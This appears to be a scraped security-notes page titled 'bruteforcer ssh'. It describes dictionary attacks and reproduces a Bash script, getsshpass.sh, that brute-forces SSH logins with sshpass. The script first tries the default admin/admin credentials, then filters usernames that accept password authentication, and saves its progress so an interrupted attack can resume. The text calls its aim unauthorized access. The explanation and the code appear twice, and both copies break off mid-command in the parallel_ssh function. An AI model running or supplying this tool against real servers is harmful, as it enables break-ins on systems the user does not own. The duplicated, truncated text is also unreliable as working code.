bruteforcer ssh

These parts collectively implement a dictionary attack against an SSH server, attempting to gain unauthorized access by trying various username-password combinations from provided dictionaries.

Dictionary Attack

A dictionary attack is a type of brute force attack technique used to gain unauthorized access to a system or an account by systematically entering every word in a pre-existing list (dictionary) of possible passwords. Instead of trying every possible combination of characters, as in a traditional brute force attack, a dictionary attack relies on trying a set of likely passwords derived from commonly used passwords, words from dictionaries, and other sources.

Explanation of Code Parts:

Reading Command Line Arguments (read_args function):
- This part of the code reads the command-line arguments provided when executing the script. It parses the arguments to extract options like IP address, TCP port, slow down factor, paths to password and username files, and handles displaying version and help information.
Checking Arguments (check_args function):
- This section validates the provided arguments to ensure they are correct and appropriate for the dictionary attack.
- It verifies the existence of necessary utilities like sshpass and checks the validity of IP address, TCP port, and provided file paths.
- Additionally, it checks if SSH connection can be established using default credentials, and if password authentication is enabled for the provided usernames.
Launching the Attack (launch_attack function):
- This part initiates the dictionary attack by iterating over each username and password combination.
- For each username, it iterates through the list of passwords, attempting to authenticate using SSH with the provided credentials.
- It spawns parallel SSH sessions to speed up the attack, trying multiple password attempts simultaneously.
Handling Signals (monitor_signal function):
- This section sets up signal handlers to trap signals like SIGHUP, SIGTERM, SIGQUIT, SIGINT, and SIGTSTP.
- It ensures that when the script is terminated or interrupted, it kills any ongoing SSH processes spawned during the attack.

#!/usr/bin/env bash

# Start time of the program
declare -r START_TIME=$(date +%s.%N)   

function usage { 
  echo -e "Usage: $0 [OPTIONS]"
  echo "OPTIONS: "
  echo -e "   -a    IP address of SSH server"
  echo -e "   -d    TCP port 1 - 65535 of SSH server"
  echo -e "   -n    slow down or speed up attack for number of seconds"
  echo -e "         e.g. 1, 0.1, 0.0, default value is 0.1"
  echo -e "   -p    path to file with passwords"
  echo -e "   -u    path to file with usernames"
  echo -e "   -v    display version"
  echo -e "   -h    display help"
}

function version {
  echo -e "getsshpass.sh 0.9"
  echo -e "Copyright (C) 2016 Radovan Brezula 'brezular'"
  echo -e "Code additions by Blai Peidro"
  echo -e "License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>."
  echo -e "This is free software: you are free to change and redistribute it."
  echo -e "There is NO WARRANTY, to the extent permitted by law."
  exit
}

function read_args {
 while getopts "a:d:n:p:u:hv" arg; do
    case "$arg" in
       a) ip="$OPTARG";;
       d) port="$OPTARG";;
       n) nval="$OPTARG";;
       p) passlist="$OPTARG"
          initpasslist="$passlist";;
       u) userlist="$OPTARG"
          inituserlist="$userlist";;
       v) version;;
       h) usage
          exit;;
    esac
 done
}

function check_args {
 pthdir="$(dirname "$0")"

 if [ -f "$pthdir/x0x901f22result.txt" ]; then
    pass=$(grep -o "d: '.*'" "$pthdir/x0x901f22result.txt" | cut -d ":" -f2)
    echo "File '$pthdir/x0x901f22result.txt' contains saved password:$pass, nothing to do" && exit
 fi

 if ! command -v sshpass &>/dev/null; then
    echo "Utility 'sshpass' not found, exiting"
    exit
 fi

 if [ -z "$ip" ]; then
    echo "IP address can't be empty, exiting"
    usage
    exit
 elif ! [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
    echo "'$ip' is not a valid IP address, exiting"
    usage
    exit
 fi

 nval=${nval:-0.1}

 if [ -z "$port" ] || ! [[ $port =~ ^[0-9]+$ ]]; then
    echo "TCP port must be a number and can't be empty, exiting"
    usage
    exit
 elif [ "$port" -gt 65535 ] || [ "$port" -lt 1 ]; then
    echo "TCP port must be in range 1 - 65535"
    usage
    exit
 fi

 if [ ! -f "$passlist" ]; then
    echo "Can't find file with list of passwords, exiting"
    usage
    exit
 fi

 if [ ! -f "$userlist" ]; then
    echo "Can't find file with list of users, exiting"
    usage
    exit
 fi

# Check SSH connection 
echo -n "Checking SSH connection to '$ip': "
if sshpass -p admin ssh -o StrictHostKeyChecking=no -o ConnectTimeout=8 -p "$port" admin@"$ip" exit &>/dev/null; then
    echo "*** OK ***"
    echo "*** Found username: 'admin' and password: 'admin' ***"  > "$pthdir/x0x901f22result.txt"
    evaluate_result
else
    rvalssh=$?
    if [ "$rvalssh" == 255 ]; then
        echo "*** FAIL ***"
        echo "*** Can't establish SSH connection to '$ip', exiting ***" && exit
    else
        echo "*** OK ***"
    fi
fi

# Check each username in the user list to see if it has password authentication enabled on the target
> "$pthdir/x092userlist.txt" # erase file on every new execution of this script
while read -r user; do
  if ssh -o BatchMode=yes -o ConnectTimeout=5 "$user@$ip" echo ok 2>&1 | grep -q "password"; then
    echo "$user" >> "$pthdir/x092userlist.txt"
  fi
done < "$userlist"

userlist="$pthdir/x092userlist.txt"      # new user list
fulluserlist="$pthdir/x092userlist.txt"  # new user list

# Read saved username and password from file 01xza01.txt, if file exists read saved credentials from file
if [ -f "$pthdir/01xza01.txt" ]; then
   read -r lastuser lastpass < "$pthdir/01xza01.txt"
   echo "Found file: '$pthdir/01xza01.txt' containing previously saved username: '$lastuser' and password: '$lastpass'"
   echo "Restoring attack using username '$lastuser' and password '$lastpass'" 
   row1user=$(grep -wno "^$lastuser$" "$userlist") || rvaluser="$?"
   row1pass=$(grep -wno "^$lastpass$" "$passlist") || rvalpass="$?"
   
   if [ -z "$rvaluser" ]; then
      rowuser=$(echo "$row1user" | cut -d ":" -f1)
      tail -n +"$rowuser" "$userlist" > "$userlist.new"
      userlist="$userlist.new"
  fi

   if [ -z "$rvalpass" ]; then
     rowpass=$(echo "$row1pass" | cut -d ":" -f1)
     tail -n +"$rowpass" "$passlist" > "$passlist.new"
     passlist="$passlist.new"
   fi 
else
   [ ! -f "$pthdir/01xza01.txt" ] && echo "Warning: Can't find file containing last used username and password in directory '$pthdir', starting from beginning"
fi

maxusercount=$(wc -l < "$fulluserlist")
maxpasscount=$(wc -l < "$fullpasslist")
maxcount=$((maxusercount * maxpasscount))
[ ! -f "$pthdir/01xza01.txt" ] && actualcount=1
}

function parallel_ssh {
 echo "$user":"$pass" > "$pthdir/01xza01.txt"
 if sshpass -p "$pass" ssh -o StrictHostKeyChecking=no -p "$port" "$user"

Display:

PreviousWeb Enumeration NextSpectre

Last updated 1 year ago

Was this helpful?

Dictionary Attack

Explanation of Code Parts:

Reading Command Line Arguments (read_args function):

This part of the code reads the command-line arguments provided when executing the script. It parses the arguments to extract options like IP address, TCP port, slow down factor, paths to password and username files, and handles displaying version and help information.

Checking Arguments (check_args function):

This section validates the provided arguments to ensure they are correct and appropriate for the dictionary attack.
It verifies the existence of necessary utilities like sshpass and checks the validity of IP address, TCP port, and provided file paths.
Additionally, it checks if SSH connection can be established using default credentials, and if password authentication is enabled for the provided usernames.

Launching the Attack (launch_attack function):

This part initiates the dictionary attack by iterating over each username and password combination.
For each username, it iterates through the list of passwords, attempting to authenticate using SSH with the provided credentials.
It spawns parallel SSH sessions to speed up the attack, trying multiple password attempts simultaneously.

Handling Signals (monitor_signal function):

This section sets up signal handlers to trap signals like SIGHUP, SIGTERM, SIGQUIT, SIGINT, and SIGTSTP.
It ensures that when the script is terminated or interrupted, it kills any ongoing SSH processes spawned during the attack.

#!/usr/bin/env bash

# Start time of the program
declare -r START_TIME=$(date +%s.%N)   

function usage { 
  echo -e "Usage: $0 [OPTIONS]"
  echo "OPTIONS: "
  echo -e "   -a    IP address of SSH server"
  echo -e "   -d    TCP port 1 - 65535 of SSH server"
  echo -e "   -n    slow down or speed up attack for number of seconds"
  echo -e "         e.g. 1, 0.1, 0.0, default value is 0.1"
  echo -e "   -p    path to file with passwords"
  echo -e "   -u    path to file with usernames"
  echo -e "   -v    display version"
  echo -e "   -h    display help"
}

function version {
  echo -e "getsshpass.sh 0.9"
  echo -e "Copyright (C) 2016 Radovan Brezula 'brezular'"
  echo -e "Code additions by Blai Peidro"
  echo -e "License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>."
  echo -e "This is free software: you are free to change and redistribute it."
  echo -e "There is NO WARRANTY, to the extent permitted by law."
  exit
}

function read_args {
 while getopts "a:d:n:p:u:hv" arg; do
    case "$arg" in
       a) ip="$OPTARG";;
       d) port="$OPTARG";;
       n) nval="$OPTARG";;
       p) passlist="$OPTARG"
          initpasslist="$passlist";;
       u) userlist="$OPTARG"
          inituserlist="$userlist";;
       v) version;;
       h) usage
          exit;;
    esac
 done
}

function check_args {
 pthdir="$(dirname "$0")"

 if [ -f "$pthdir/x0x901f22result.txt" ]; then
    pass=$(grep -o "d: '.*'" "$pthdir/x0x901f22result.txt" | cut -d ":" -f2)
    echo "File '$pthdir/x0x901f22result.txt' contains saved password:$pass, nothing to do" && exit
 fi

 if ! command -v sshpass &>/dev/null; then
    echo "Utility 'sshpass' not found, exiting"
    exit
 fi

 if [ -z "$ip" ]; then
    echo "IP address can't be empty, exiting"
    usage
    exit
 elif ! [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
    echo "'$ip' is not a valid IP address, exiting"
    usage
    exit
 fi

 nval=${nval:-0.1}

 if [ -z "$port" ] || ! [[ $port =~ ^[0-9]+$ ]]; then
    echo "TCP port must be a number and can't be empty, exiting"
    usage
    exit
 elif [ "$port" -gt 65535 ] || [ "$port" -lt 1 ]; then
    echo "TCP port must be in range 1 - 65535"
    usage
    exit
 fi

 if [ ! -f "$passlist" ]; then
    echo "Can't find file with list of passwords, exiting"
    usage
    exit
 fi

 if [ ! -f "$userlist" ]; then
    echo "Can't find file with list of users, exiting"
    usage
    exit
 fi

# Check SSH connection 
echo -n "Checking SSH connection to '$ip': "
if sshpass -p admin ssh -o StrictHostKeyChecking=no -o ConnectTimeout=8 -p "$port" admin@"$ip" exit &>/dev/null; then
    echo "*** OK ***"
    echo "*** Found username: 'admin' and password: 'admin' ***"  > "$pthdir/x0x901f22result.txt"
    evaluate_result
else
    rvalssh=$?
    if [ "$rvalssh" == 255 ]; then
        echo "*** FAIL ***"
        echo "*** Can't establish SSH connection to '$ip', exiting ***" && exit
    else
        echo "*** OK ***"
    fi
fi

# Check each username in the user list to see if it has password authentication enabled on the target
> "$pthdir/x092userlist.txt" # erase file on every new execution of this script
while read -r user; do
  if ssh -o BatchMode=yes -o ConnectTimeout=5 "$user@$ip" echo ok 2>&1 | grep -q "password"; then
    echo "$user" >> "$pthdir/x092userlist.txt"
  fi
done < "$userlist"

userlist="$pthdir/x092userlist.txt"      # new user list
fulluserlist="$pthdir/x092userlist.txt"  # new user list

# Read saved username and password from file 01xza01.txt, if file exists read saved credentials from file
if [ -f "$pthdir/01xza01.txt" ]; then
   read -r lastuser lastpass < "$pthdir/01xza01.txt"
   echo "Found file: '$pthdir/01xza01.txt' containing previously saved username: '$lastuser' and password: '$lastpass'"
   echo "Restoring attack using username '$lastuser' and password '$lastpass'" 
   row1user=$(grep -wno "^$lastuser$" "$userlist") || rvaluser="$?"
   row1pass=$(grep -wno "^$lastpass$" "$passlist") || rvalpass="$?"
   
   if [ -z "$rvaluser" ]; then
      rowuser=$(echo "$row1user" | cut -d ":" -f1)
      tail -n +"$rowuser" "$userlist" > "$userlist.new"
      userlist="$userlist.new"
  fi

   if [ -z "$rvalpass" ]; then
     rowpass=$(echo "$row1pass" | cut -d ":" -f1)
     tail -n +"$rowpass" "$passlist" > "$passlist.new"
     passlist="$passlist.new"
   fi 
else
   [ ! -f "$pthdir/01xza01.txt" ] && echo "Warning: Can't find file containing last used username and password in directory '$pthdir', starting from beginning"
fi

maxusercount=$(wc -l < "$fulluserlist")
maxpasscount=$(wc -l < "$fullpasslist")
maxcount=$((maxusercount * maxpasscount))
[ ! -f "$pthdir/01xza01.txt" ] && actualcount=1
}

function parallel_ssh {
 echo "$user":"$pass" > "$pthdir/01xza01.txt"
 if sshpass -p "$pass" ssh -o StrictHostKeyChecking=no -p "$port" "$user"

Display: